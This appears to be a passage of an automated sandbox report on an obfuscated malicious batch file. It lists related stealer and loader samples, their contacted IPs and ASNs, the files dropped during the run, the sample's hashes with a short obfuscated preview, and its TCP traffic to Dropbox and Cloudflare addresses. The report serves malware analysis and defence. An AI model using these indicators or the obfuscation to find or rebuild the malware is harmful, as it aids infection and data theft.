                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        sldkjgsdGarDe3.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        jhsdfggga13.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        www-env.dropbox-dns.comhnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.125.65.18
                                                                                                                                                                                                                        edge-block-www-env.dropbox-dns.comhnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        hnsjdghf18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        kjshdgacg18.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.15

                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 172.67.179.109
                                                                                                                                                                                                                        ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.211.185
                                                                                                                                                                                                                        rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.67.211.185
                                                                                                                                                                                                                        hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 172.64.41.3
                                                                                                                                                                                                                        DROPBOXUShnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        CNUXJvLcgw.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.4.18
                                                                                                                                                                                                                        xWpAZpLw47.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.15
                                                                                                                                                                                                                        RFQ Letter and Instructions.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.125.21.1

                                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                        3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        ny.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        rs.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hnghksdjfhs19De.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        kjhsdgGarmin17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hngadsfkgj17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        hsfgdf17.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        gar17lksgf.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78
                                                                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                        • 162.125.69.18
                                                                                                                                                                                                                        • 172.65.251.78

                                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                                        No context

                                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64
                                                                                                                                                                                                                        Entropy (8bit):0.6599547231656377
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:NlllulF/:NllU
                                                                                                                                                                                                                        MD5:D4E6196808B47A1E5AF7B5A60B402DF3
                                                                                                                                                                                                                        SHA1:B95060DEECFA481BAC34C97BBEBF0C63103293B4
                                                                                                                                                                                                                        SHA-256:E15BCC9157652A05817A5261332766027BD5CC4462C2E0492FB4C530251EAE9F
                                                                                                                                                                                                                        SHA-512:2A85D3E6E058A9347821DD908E48D5BB3C5169B8C40B750C97742592D0233A7B7E2BD34EBA4C139E4981F7B5B81A494F2D075465E6572B9D451ACE17D259AFE7
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:@...e...........................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vbrmbga.n2y.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31ihql53.u3p.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3dlwekwl.kqu.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ieelygv.5h0.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5efezaoi.uga.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d4e1xljc.y2j.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khuzvzo1.4ly.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kllmeezx.4wg.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qu3vl5sj.2rl.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sml4d1bp.3hn.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\Desktop\tmp

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):14
                                                                                                                                                                                                                        Entropy (8bit):3.521640636343319
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Mrv:gv
                                                                                                                                                                                                                        MD5:CE585C6BA32AC17652D2345118536F9C
                                                                                                                                                                                                                        SHA1:BE0E41B3690C42E4C0CDB53D53FC544FB46B758D
                                                                                                                                                                                                                        SHA-256:589C942E748EA16DC86923C4391092707CE22315EB01CB85B0988C6762AA0ED3
                                                                                                                                                                                                                        SHA-512:D397EDA475D6853CE5CC28887690DDD5F8891BE43767CDB666396580687F901FB6F0CC572AFA18BDE1468A77E8397812009C954F386C8F69CC0678E1253D5752
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:ECHO is off...

                                                                                                                                                                                                                        \Device\Null

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\find.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):36
                                                                                                                                                                                                                        Entropy (8bit):3.8956388075276664
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:gOmAe9qQn:xm/
                                                                                                                                                                                                                        MD5:89D484A82D15549C8F4BF2B4D4F1E924
                                                                                                                                                                                                                        SHA1:58F49E997A58A17C2902E08026BAC2DD16A34B1B
                                                                                                                                                                                                                        SHA-256:040AE1183CD6102AC612B2D88C2816B358FDC4743BC9CD05376E797595167B40
                                                                                                                                                                                                                        SHA-512:C0C920A9369FF9E28C9DAE6CA21AE7A1F9A79F2F4F8F97E247D133700FC446CEAA2C6C40116DE644CEA9336D9064792F3AD7011EBCBF5B6675779C57590F167B
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:FIND: Parameter format not correct..

                                                                                                                                                                                                                        Static File Info

                                                                                                                                                                                                                        General

                                                                                                                                                                                                                        File type:Unicode text, UTF-16, little-endian text, with very long lines (17045), with no line terminators
                                                                                                                                                                                                                        Entropy (8bit):5.64631092555636
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Text - UTF-16 (LE) encoded (2002/1) 66.67%
                                                                                                                                                                                                                        • MP3 audio (1001/1) 33.33%
                                                                                                                                                                                                                        File name:fghdsdf17.bat
                                                                                                                                                                                                                        File size:34'092 bytes
                                                                                                                                                                                                                        MD5:065d7356dd69172c50ad447904d19df9
                                                                                                                                                                                                                        SHA1:034f82a55696405a385720b6d5b0e669881dbbf6
                                                                                                                                                                                                                        SHA256:016e96cc8d72183ca8d8f2b00c3effaac50f44888504d38519dc7dbfc062f64d
                                                                                                                                                                                                                        SHA512:5c72e0daa69a85d49386ed9451137a85eccad45351cee2b3fdfe5afb621246560b112a11eb3134e85cbdec1c024b372fdbe2d0b9116146146cecf139a868ccbb
                                                                                                                                                                                                                        SSDEEP:768:KOj370GPrRFVzQ4WYIbOiNRwy6P1hMBypl2wisZtcG/+oVfdI6l8K8JfW2ProbMZ:b/z0b1Rwy6P1hMBypl2wisZtcG/+oVfa
                                                                                                                                                                                                                        TLSH:80E2C744070F2A4B16879B61E152EAB224E5747F24BF9736CA3C75EC96B150CDE3283B
                                                                                                                                                                                                                        File Content Preview:....>nul 2>&1 &cls.;@e%...(......_...)......(......_...)^......(......_...)...(.........)(........)...( ..._...)...%%...(......_...)^...(........)(........)(........)(........)(.........)%%(.........)(........)(.........)(......^...)(........)(........)%^

                                                                                                                                                                                                                        File Icon

                                                                                                                                                                                                                        Icon Hash:9686878b929a9886

                                                                                                                                                                                                                        Network Behavior

                                                                                                                                                                                                                        Network Port Distribution

                                                                                                                                                                                                                        TCP Packets

                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.484086037 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.484122992 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.484260082 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.494216919 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:19.494229078 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.204276085 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.204360962 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.241792917 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.241818905 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.242084980 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.253273964 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:21.295327902 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.321645021 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.321728945 CET44349704162.125.69.18192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.321779013 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.321829081 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:22.327637911 CET49704443192.168.2.8162.125.69.18
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.359955072 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.360008955 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.360091925 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.362826109 CET49705443192.168.2.8172.65.251.78
                                                                                                                                                                                                                        Dec 19, 2024 14:20:29.362839937 CET44349705172.65.251.78192.168.2.8
                                                                                                                                                                                                                        Dec 19, 2024 14:20:30.611351967 CET44349705172.65.251.78192.168.2.8
